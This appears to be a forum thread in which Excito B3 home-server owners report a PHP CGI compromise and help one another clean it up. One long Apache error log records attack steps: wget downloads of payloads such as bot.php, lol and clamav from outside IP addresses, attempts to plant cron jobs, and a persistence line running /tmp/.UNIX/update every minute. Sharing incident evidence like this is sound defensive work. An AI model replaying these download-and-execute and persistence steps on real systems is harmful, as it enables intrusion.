Page 2 of 14
Re: I have been attacked and don't know why.
Posted: 02 Nov 2013, 18:56
by Binkem
Hi,
I'm finding the
b>Security Alert!</b> The PHP CGI cannot be accessed directly.
lines in my error.log. I connot find any cronjobs on my B3 (typing crontab -e as www-data, root and myself.
Does this mean that i'm not (yet) infected? Or am i looking in the worng place.
Martijn
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 03:30
by Ubi
They got me as well... I found an entry to stablehost.us in the crontab for www-data
and two hidden files in /dev/shm/ that contained the malware payload.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 04:16
by Ubi
So why exactly does www-data have a valid shell on the B3?
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 04:18
by RandomUsername
I was wondering the same thing myself. I checked my /dev/shm and there are no hidden files there.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 07:43
by toukie
Same stuff in logs here plus this in crontab www-data:
* * * * * /tmp/.UNIX/update >/dev/null 2>&1
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 07:51
by Ubi
so I guess it's safe to say there are multiple attacks that use the same point of entry, but have a slightly different payload.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 08:31
by RandomUsername
Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 09:19
by Gordon
RandomUsername wrote:Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Not likely. I see similar attempts on my B3 and I can state for a fact that they are not using the myownb3 host names.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 09:27
by toukie
What is the fix for this?
I have ". .. network" in /dev/shm. What does that say?
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 10:10
by Puma
hello,
Under attack as well.
how can i check the cron-job for www-data ??
in my errorlog i found:
Code: Select all
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: c:windowssystem32cmd.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] %TEMP%x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: bitsadmin: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ftp: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: del: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/lol
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- ftp://ftp:*password*@80.79.48.186/bot.php
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] => `bot.php'
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 80.79.48.186:21...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/c
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logging in as ftp ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logged in!
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ==> SYST ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] done. ==> PWD ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> TYPE I ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> CWD not needed.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> SIZE bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 15138
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> PASV ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> RETR bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] Length: 15138 (15K) (unauthoritative)
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 0K ..
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] . .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .. 100% 158K=0.09s
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:01 (158 KB/s) - `bot.php' saved [15138]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 6906 (6.7K) [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `lol'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K .
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 256 [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `c'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K 100% 8.55M=0s
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:04 (8.55 MB/s) - `c' saved [256/256]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:05-- http://74.52.9.186/a
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] ..
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] . 100% 3.33K=2.0s
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:06 (3.33 KB/s) - `lol' saved [6906/6906]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 1:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] \x7fELF\x01\x01\x01\x02\x03\x01\xb8%@44: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 2:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ,\xe3\x8a\x10^=^=^=\x14\x15\x02\xfb\xff\xff\xff#!/usr/bin/perl: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 5: Syntax error: "(" unexpected
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Length: 712 [text/plain]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Saving to: `a'
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 0K 100% 21.4M=0s
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:14 (21.4 MB/s) - `a' saved [712/712]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] no crontab for www-data
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:14-- http://74.52.9.186/update
[Sun Nov 03 14:43:24 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Length: 208 [text/plain]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Saving to: `update'
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 0K 100% 6.40M=0s
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:28 (6.40 MB/s) - `update' saved [208/208]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: No such file or directory while trying to stat bash
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on dmgshm
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Operation not supported while reading flags on ftdaemon
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-hdroogers
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-root
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on shallalist.tar
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:28-- http://74.52.9.186/clamav
[Sun Nov 03 14:43:30 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Length: 379680 (371K) [text/plain]
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Saving to: `clamav'
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:40 2013] [error] [client 37.187.77.137] 0K .......... .......... .......... .......... .......... 13% 8.69K 37s
[Sun Nov 03 14:43:45 2013] [error] [client 37.187.77.137] 50K .......... .......... .......... .......... .......... 26% 10.4K 29s
[Sun Nov 03 14:43:51 2013] [error] [client 37.187.77.137] 100K .......... .......... .......... .......... .......... 40% 8.04K 25s
[Sun Nov 03 14:43:57 2013] [error] [client 37.187.77.137] 150K .......... .......... .......... .......... .......... 53% 8.25K 19s
[Sun Nov 03 14:44:07 2013] [error] [client 37.187.77.137] 200K .......... .......... .......... .......... .......... 67% 5.24K 16s
[Sun Nov 03 14:44:20 2013] [error] [client 37.187.77.137] 250K .......... .......... .......... .......... .......... 80% 3.92K 11s
[Sun Nov 03 14:44:28 2013] [error] [client 37.187.77.137] 300K .......... .......... .......... .......... .......... 94% 5.38K 3s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 350K .......... .......... 100% 9.49K=57s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 2013-11-03 14:44:31 (6.55 KB/s) - `clamav' saved [379680/379680]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 19: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 20: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] ./bash: 1: Syntax error: "(" unexpected
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] chattr: Operation not permitted while setting flags on bash
[Sun Nov 03 14:48:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 14:48:01 2013] [error] [client 37.187.77.137] Script timed out before returning headers: php
[Sun Nov 03 14:53:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
i think this is not ok.... ftp access was not enabled!!
What can i do best?
Puma
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 10:12
by DanielM
RandomUsername wrote:Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Nope. I have my own .se domain, I've never used myownb3.com.
I'm in Sweden, on dynamic IP (I've had the same IP for some years now though). The IP is 88.206.x.x, I doubt that anyone else here is in the same range.
I'm out of guesses now, but it sure doesn't feel like coincidence...
/Daniel
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 10:14
by DanielM
Puma wrote:how can i check the cron-job for www-data ??
You can (logged in as root) do either "crontab -u www-data -l" to list all cron jobs for www-data or "crontab -u www-data -e" to open up an editor (I think you'll get nano) for the jobs. Just delete the rows that shouldn't be there and save with ctrl-x. You might want to take a copy of the rows first so that you can check what they did.
/Daniel
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 10:32
by Puma
Thanks Daniel,
Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab
seems we all are attacked!
Puma
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 10:56
by Gordon
Puma wrote:Thanks Daniel,
Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab
seems we all are attacked!
Puma
That sounds a bit like jumping to conclusions to me. Also, on my B3 I do not have the exact same log entries as quoted here, but that may be the result of my webserver not responding correctly for this exploit (I do not have Apache running on the exposed B3, but Nginx).
However, if all of you can match times at which the attacks occurred, that could point to someone being able to access the logs of either this forum or the Excito update site.
Re: I have been attacked and don't know why.
Posted: 03 Nov 2013, 11:49
by Puma
Youre probably right,
My fathers B2 was not attacked (vs 2.6 uses update but not forum)
My brother in law B3 was not attacked (vs 2.5 without forum)
Can excito check the access of the logs?
Are there countermeasures which we can take other than deleting www-data cron jobs and/or tmp/entries?
Puma